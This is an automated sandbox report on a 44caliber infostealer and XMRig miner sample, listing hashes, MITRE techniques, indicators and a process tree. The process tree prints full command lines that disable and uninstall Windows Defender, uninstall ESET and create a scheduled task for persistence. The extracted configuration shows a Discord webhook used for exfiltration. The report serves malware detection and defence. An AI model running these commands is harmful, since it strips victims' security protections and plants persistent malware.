44caliber | a15c3b6773fa9d8db715f8c557c76c95e8f84db0fa5046ed7a01589bfdc778b5

Analysis

max time kernel
130s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
20-04-2024 16:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe
Size

9.5MB
MD5

fd2f11c31192e8efe0eb4b37d1a5e1b6
SHA1

48b2610a347ae04cd61cd33100715ca5476e1951
SHA256

a15c3b6773fa9d8db715f8c557c76c95e8f84db0fa5046ed7a01589bfdc778b5
SHA512

39a5e38dfb04b462e167462e78fe9cf018215cd8e9fcc7e1cf67e6ea93f99176af49995ed9c987899f140fe32faeda6757a2e814944b899454e771f183b04afa
SSDEEP

196608:0FSJAB+ZcpS+S6SrGTsD2dmmhGlkrwPgZS7rjsn6P44Nm:0FS+Bkc0+Fe6dmracMR7

Score

10^/10

44caliber xmrig discovery evasion miner spyware stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/4772-1945-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1947-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1944-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1975-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1977-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1979-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1980-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1981-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-1987-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-2033-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-2034-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/4772-2035-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	InterialoaderNOP.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	Interialoader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	Interia loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	Services.exe

Executes dropped EXE 12 IoCs

pid	Process
5044	InterialoaderNOP.exe
2860	Config.exe
2884	Interialoader.exe
4452	InteriaVis.exe
3736	Interia loader.exe
3160	Insidious.exe
180	sihost64.exe
4364	Services.exe
1844	dismhost.exe
3144	dismhost.exe
4896	dismhost.exe
5116	sihost64.exe

Loads dropped DLL 57 IoCs

pid	Process
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
1844	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
3144	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe
4896	dismhost.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4576	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
94	raw.githubusercontent.com
95	raw.githubusercontent.com
91	pastebin.com
92	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	freegeoip.app
23	freegeoip.app

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4364 set thread context of 4772	4364	Services.exe	200

Drops file in Program Files directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ucrtbase.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\DLL\kernel32.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\symbols\DLL\kernel32.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\symbols\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ucrtbase.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\dll\ucrtbase.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\DLL\kernel32.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\symbols\DLL\kernel32.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\symbols\dll\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\dll\ucrtbase.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\kernel32.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\ntdll.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\kernel32.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\symbols\dll\jvm.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\ucrtbase.pdb	javaw.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\symbols\dll\ucrtbase.pdb	javaw.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3160	sc.exe
2884	sc.exe
4572	sc.exe
4216	sc.exe
3200	sc.exe
5044	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4260	schtasks.exe
3188	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3160	Insidious.exe
3160	Insidious.exe
3160	Insidious.exe
1700	powershell.exe
1700	powershell.exe
3160	Insidious.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
264	powershell.exe
3736	Interia loader.exe
264	powershell.exe
1664	powershell.exe
1664	powershell.exe
4888	powershell.exe
4888	powershell.exe
2160	powershell.exe
2160	powershell.exe
1748	powershell.exe
1748	powershell.exe
1748	powershell.exe
768	powershell.exe
768	powershell.exe
768	powershell.exe
3736	Interia loader.exe
3736	Interia loader.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
2600	powershell.exe
2600	powershell.exe
3892	powershell.exe
3892	powershell.exe
2600	powershell.exe
3892	powershell.exe
4948	powershell.exe
216	powershell.exe
4948	powershell.exe
216	powershell.exe
216	powershell.exe
4948	powershell.exe
2924	powershell.exe
2924	powershell.exe
2864	powershell.exe
2864	powershell.exe
2864	powershell.exe
448	powershell.exe
448	powershell.exe
448	powershell.exe
2924	powershell.exe
3824	powershell.exe
3824	powershell.exe
4068	powershell.exe
4068	powershell.exe
3824	powershell.exe
4068	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
1104	powershell.exe
1104	powershell.exe
3364	powershell.exe
3364	powershell.exe
3364	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3160	Insidious.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	3736	Interia loader.exe
Token: SeDebugPrivilege	264	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4064	Dism.exe
Token: SeRestorePrivilege	4064	Dism.exe
Token: SeIncreaseQuotaPrivilege	2420	WMIC.exe
Token: SeSecurityPrivilege	2420	WMIC.exe
Token: SeTakeOwnershipPrivilege	2420	WMIC.exe
Token: SeLoadDriverPrivilege	2420	WMIC.exe
Token: SeSystemProfilePrivilege	2420	WMIC.exe
Token: SeSystemtimePrivilege	2420	WMIC.exe
Token: SeProfSingleProcessPrivilege	2420	WMIC.exe
Token: SeIncBasePriorityPrivilege	2420	WMIC.exe
Token: SeCreatePagefilePrivilege	2420	WMIC.exe
Token: SeBackupPrivilege	2420	WMIC.exe
Token: SeRestorePrivilege	2420	WMIC.exe
Token: SeShutdownPrivilege	2420	WMIC.exe
Token: SeDebugPrivilege	2420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2420	WMIC.exe
Token: SeRemoteShutdownPrivilege	2420	WMIC.exe
Token: SeUndockPrivilege	2420	WMIC.exe
Token: SeManageVolumePrivilege	2420	WMIC.exe
Token: 33	2420	WMIC.exe
Token: 34	2420	WMIC.exe
Token: 35	2420	WMIC.exe
Token: 36	2420	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2420	WMIC.exe
Token: SeSecurityPrivilege	2420	WMIC.exe
Token: SeTakeOwnershipPrivilege	2420	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2420 wrote to memory of 5044	2420	fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe	88
PID 2420 wrote to memory of 5044	2420	fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe	88
PID 2420 wrote to memory of 2860	2420	fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe	89
PID 2420 wrote to memory of 2860	2420	fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe	89
PID 2420 wrote to memory of 2860	2420	fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe	89
PID 5044 wrote to memory of 2884	5044	InterialoaderNOP.exe	91
PID 5044 wrote to memory of 2884	5044	InterialoaderNOP.exe	91
PID 5044 wrote to memory of 4452	5044	InterialoaderNOP.exe	92
PID 5044 wrote to memory of 4452	5044	InterialoaderNOP.exe	92
PID 5044 wrote to memory of 4452	5044	InterialoaderNOP.exe	92
PID 4452 wrote to memory of 5096	4452	InteriaVis.exe	93
PID 4452 wrote to memory of 5096	4452	InteriaVis.exe	93
PID 2884 wrote to memory of 3736	2884	Interialoader.exe	94
PID 2884 wrote to memory of 3736	2884	Interialoader.exe	94
PID 2884 wrote to memory of 3160	2884	Interialoader.exe	95
PID 2884 wrote to memory of 3160	2884	Interialoader.exe	95
PID 3736 wrote to memory of 1284	3736	Interia loader.exe	96
PID 3736 wrote to memory of 1284	3736	Interia loader.exe	96
PID 5096 wrote to memory of 4576	5096	javaw.exe	97
PID 5096 wrote to memory of 4576	5096	javaw.exe	97
PID 1284 wrote to memory of 1700	1284	cmd.exe	100
PID 1284 wrote to memory of 1700	1284	cmd.exe	100
PID 1284 wrote to memory of 3384	1284	cmd.exe	103
PID 1284 wrote to memory of 3384	1284	cmd.exe	103
PID 3736 wrote to memory of 2036	3736	Interia loader.exe	105
PID 3736 wrote to memory of 2036	3736	Interia loader.exe	105
PID 2036 wrote to memory of 4260	2036	cmd.exe	109
PID 2036 wrote to memory of 4260	2036	cmd.exe	109
PID 1284 wrote to memory of 264	1284	cmd.exe	110
PID 1284 wrote to memory of 264	1284	cmd.exe	110
PID 1284 wrote to memory of 1664	1284	cmd.exe	122
PID 1284 wrote to memory of 1664	1284	cmd.exe	122
PID 1284 wrote to memory of 4888	1284	cmd.exe	113
PID 1284 wrote to memory of 4888	1284	cmd.exe	113
PID 1284 wrote to memory of 2160	1284	cmd.exe	115
PID 1284 wrote to memory of 2160	1284	cmd.exe	115
PID 1284 wrote to memory of 1748	1284	cmd.exe	149
PID 1284 wrote to memory of 1748	1284	cmd.exe	149
PID 1284 wrote to memory of 768	1284	cmd.exe	119
PID 1284 wrote to memory of 768	1284	cmd.exe	119
PID 3736 wrote to memory of 180	3736	Interia loader.exe	120
PID 3736 wrote to memory of 180	3736	Interia loader.exe	120
PID 180 wrote to memory of 2952	180	sihost64.exe	121
PID 180 wrote to memory of 2952	180	sihost64.exe	121
PID 2952 wrote to memory of 1744	2952	cmd.exe	123
PID 2952 wrote to memory of 1744	2952	cmd.exe	123
PID 3736 wrote to memory of 4364	3736	Interia loader.exe	124
PID 3736 wrote to memory of 4364	3736	Interia loader.exe	124
PID 4364 wrote to memory of 3452	4364	Services.exe	125
PID 4364 wrote to memory of 3452	4364	Services.exe	125
PID 3452 wrote to memory of 3892	3452	cmd.exe	127
PID 3452 wrote to memory of 3892	3452	cmd.exe	127
PID 1284 wrote to memory of 2600	1284	cmd.exe	128
PID 1284 wrote to memory of 2600	1284	cmd.exe	128
PID 3452 wrote to memory of 216	3452	cmd.exe	131
PID 3452 wrote to memory of 216	3452	cmd.exe	131
PID 2952 wrote to memory of 4948	2952	cmd.exe	130
PID 2952 wrote to memory of 4948	2952	cmd.exe	130
PID 2952 wrote to memory of 2864	2952	cmd.exe	132
PID 2952 wrote to memory of 2864	2952	cmd.exe	132
PID 3452 wrote to memory of 2924	3452	cmd.exe	133
PID 3452 wrote to memory of 2924	3452	cmd.exe	133
PID 1284 wrote to memory of 448	1284	cmd.exe	134
PID 1284 wrote to memory of 448	1284	cmd.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fd2f11c31192e8efe0eb4b37d1a5e1b6_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe
  "C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
    "C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3736
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3384
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:264
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1664
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableArchiveScanning $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4888
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableScriptScanning $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -DisableIOAVProtection $true
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -MAPSReporting Disabled
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3956
      - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        6⤵
        Launches sc.exe
        
        PID:3200
      - C:\Windows\system32\sc.exe
        
        sc stop WinDefend
        6⤵
        Launches sc.exe
        
        PID:5044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Stop-Service WinDefend
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3748
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-Service WinDefend -StartupType Disabled
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
      - C:\Windows\system32\Dism.exe
        
        Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
        6⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\76ACC2D2-0A1E-46D0-B7BD-4C5A3C1AB24A\dismhost.exe {B76DDC7B-F7F6-4AC6-8DA1-5CAAA1F276F5}
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1844
      - C:\Windows\System32\Wbem\WMIC.exe
        
        Wmic Product where name="Eset Security" call uninstall
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2036
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:4260
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:180
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4068
        
